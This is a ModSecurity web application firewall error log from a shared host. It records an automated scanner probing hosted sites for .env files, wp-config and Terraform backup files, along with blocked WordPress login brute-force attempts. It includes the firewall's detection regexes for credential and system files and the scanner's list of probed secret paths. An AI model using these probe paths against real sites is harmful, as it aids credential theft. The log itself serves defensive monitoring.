[Tue May 26 14:50:07.211201 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.5:5138] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/wp-config.php.txt"] [unique_id "ahVlx7EQDDtxJNiDrdT1TwAAAPM"]
[Tue May 26 14:50:07.211310 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:32178] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/stg/.env"] [unique_id "ahVlx7EQDDtxJNiDrdT1TgAAAPU"]
[Tue May 26 14:50:07.225736 2026] [security2:error] [pid 648203:tid 648394] [client 46.203.157.253:39403] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVlxrEQDDtxJNiDrdT1JwAAAMI"], referer: https://anujtradingco.com
[Tue May 26 14:50:07.234237 2026] [security2:error] [pid 648203:tid 648430] [client 45.148.10.95:32158] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1SAAAAOY"]
[Tue May 26 14:50:07.240490 2026] [security2:error] [pid 648203:tid 648333] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1TAAAAIU"]
[Tue May 26 14:50:07.245297 2026] [security2:error] [pid 648203:tid 648360] [client 45.148.10.95:32084] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1SgAAAKA"]
[Tue May 26 14:50:07.261795 2026] [security2:error] [pid 648203:tid 648390] [client 45.148.10.95:32056] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1TQAAAL4"]
[Tue May 26 14:50:07.273139 2026] [security2:error] [pid 648203:tid 648299] [remote 94.76.235.103:45680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1QgAA6F8"]
[Tue May 26 14:50:07.287692 2026] [security2:error] [pid 648203:tid 648376] [client 45.148.10.95:32110] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1UQAAALA"]
[Tue May 26 14:50:07.292579 2026] [security2:error] [pid 648203:tid 648351] [client 45.148.10.95:32040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1VAAAAJc"]
[Tue May 26 14:50:07.335286 2026] [security2:error] [pid 648203:tid 648406] [client 45.148.10.95:32034] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1VQAAAM4"]
[Tue May 26 14:50:07.362774 2026] [security2:error] [pid 648203:tid 648408] [client 45.148.10.95:31966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1VgAAANA"]
[Tue May 26 14:50:07.459556 2026] [security2:error] [pid 648203:tid 648401] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1WQAAAMk"]
[Tue May 26 14:50:07.465894 2026] [security2:error] [pid 648203:tid 648364] [client 45.148.10.95:32176] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1WgAAAKQ"]
[Tue May 26 14:50:07.515453 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:32170] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/stripe/.env"] [unique_id "ahVlx7EQDDtxJNiDrdT1ZQAAALI"]
[Tue May 26 14:50:07.517052 2026] [security2:error] [pid 648203:tid 648402] [client 209.50.181.226:11175] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlxrEQDDtxJNiDrdT0-wAAAMo"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:50:07.534020 2026] [security2:error] [pid 648203:tid 648404] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1XQAAAMw"]
[Tue May 26 14:50:07.544093 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1YAAAAN0"]
[Tue May 26 14:50:07.566286 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1ZAAAANs"]
[Tue May 26 14:50:07.576170 2026] [security2:error] [pid 648203:tid 648370] [client 45.148.10.95:32214] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1ZgAAAKo"]
[Tue May 26 14:50:07.594431 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1aQAAAMU"]
[Tue May 26 14:50:07.626880 2026] [security2:error] [pid 648203:tid 648368] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1bwAAAKg"]
[Tue May 26 14:50:07.668536 2026] [security2:error] [pid 648203:tid 648416] [client 193.37.33.156:60225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1YQAAANg"]
[Tue May 26 14:50:07.692128 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:32034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/test.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1cgAAALc"]
[Tue May 26 14:50:07.722745 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:32040] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1cAAAAJ4"]
[Tue May 26 14:50:07.724496 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:32214] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/test/.env"] [unique_id "ahVlx7EQDDtxJNiDrdT1dAAAAJ0"]
[Tue May 26 14:50:07.740845 2026] [security2:error] [pid 648203:tid 648345] [client 45.148.10.95:32110] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1cQAAAJE"]
[Tue May 26 14:50:07.760981 2026] [security2:error] [pid 648203:tid 648405] [client 45.148.10.95:31966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1cwAAAM0"]
[Tue May 26 14:50:07.778470 2026] [security2:error] [pid 648203:tid 648354] [client 45.148.10.95:32062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/user/.env"] [unique_id "ahVlx7EQDDtxJNiDrdT1ewAAAJo"]
[Tue May 26 14:50:07.797260 2026] [security2:error] [pid 648203:tid 648355] [client 45.148.10.95:31998] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/terraform.tfstate.backup"] [unique_id "ahVlx7EQDDtxJNiDrdT1fQAAAJs"]
[Tue May 26 14:50:07.804186 2026] [security2:error] [pid 648203:tid 648450] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1dwAAAPo"]
[Tue May 26 14:50:07.827286 2026] [security2:error] [pid 648203:tid 648427] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1egAAAOM"]
[Tue May 26 14:50:07.859074 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1fwAAAKk"]
[Tue May 26 14:50:07.865326 2026] [security2:error] [pid 648203:tid 648442] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1ggAAAPI"]
[Tue May 26 14:50:07.886079 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:32110] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/v3/.env"] [unique_id "ahVlx7EQDDtxJNiDrdT1iAAAALQ"]
[Tue May 26 14:50:07.918386 2026] [security2:error] [pid 648203:tid 648457] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1hQAAAQE"]
[Tue May 26 14:50:07.948598 2026] [security2:error] [pid 648203:tid 648337] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1iQAAAIk"]
[Tue May 26 14:50:07.971398 2026] [security2:error] [pid 648203:tid 648445] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1jwAAAPU"]
[Tue May 26 14:50:07.981925 2026] [security2:error] [pid 648203:tid 648360] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1kgAAAKA"]
[Tue May 26 14:50:08.025574 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:32176] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/v1/.env"] [unique_id "ahVlyLEQDDtxJNiDrdT1nwAAAKU"]
[Tue May 26 14:50:08.045819 2026] [security2:error] [pid 648203:tid 648431] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlx7EQDDtxJNiDrdT1mQAAAOc"]
[Tue May 26 14:50:08.055337 2026] [security2:error] [pid 648203:tid 648378] [client 45.148.10.95:17002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/v2/.env"] [unique_id "ahVlyLEQDDtxJNiDrdT1oAAAALI"]
[Tue May 26 14:50:08.072570 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1ngAAAPA"]
[Tue May 26 14:50:08.161076 2026] [security2:error] [pid 648203:tid 648455] [client 45.148.10.95:32198] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1pAAAAP8"]
[Tue May 26 14:50:08.161998 2026] [security2:error] [pid 648203:tid 648403] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1owAAAMs"]
[Tue May 26 14:50:08.190772 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:31870] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1pQAAALk"]
[Tue May 26 14:50:08.205820 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1qwAAAMg"]
[Tue May 26 14:50:08.241500 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1rwAAALw"]
[Tue May 26 14:50:08.298288 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:17002] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1sAAAAI8"]
[Tue May 26 14:50:08.313210 2026] [security2:error] [pid 648203:tid 648368] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1swAAAKg"]
[Tue May 26 14:50:08.331586 2026] [security2:error] [pid 648203:tid 648342] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1tgAAAI4"]
[Tue May 26 14:50:08.332799 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:32062] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/var/www/.env"] [unique_id "ahVlyLEQDDtxJNiDrdT1uwAAAJ4"]
[Tue May 26 14:50:08.341774 2026] [security2:error] [pid 648203:tid 648448] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1uQAAAPg"]
[Tue May 26 14:50:08.378445 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:32214] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1ugAAALc"]
[Tue May 26 14:50:08.421999 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1vgAAAPw"]
[Tue May 26 14:50:08.457055 2026] [security2:error] [pid 648203:tid 648436] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1xAAAAOw"]
[Tue May 26 14:50:08.463250 2026] [security2:error] [pid 648203:tid 648363] [client 45.148.10.95:32056] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1xgAAAKM"]
[Tue May 26 14:50:08.472147 2026] [security2:error] [pid 648203:tid 648456] [client 45.148.10.95:32118] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1yAAAAQA"]
[Tue May 26 14:50:08.518876 2026] [security2:error] [pid 648203:tid 648349] [client 45.148.10.95:32110] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1ygAAAJU"]
[Tue May 26 14:50:08.537446 2026] [security2:error] [pid 648203:tid 648413] [client 45.148.10.95:32062] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlyLEQDDtxJNiDrdT1ywAAANU"]
[Tue May 26 14:50:08.570228 2026] [security2:error] [pid 648203:tid 648372] [client 45.148.10.95:32148] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/var/www/html/.env"] [unique_id "ahVlyLEQDDtxJNiDrdT10wAAAKw"]
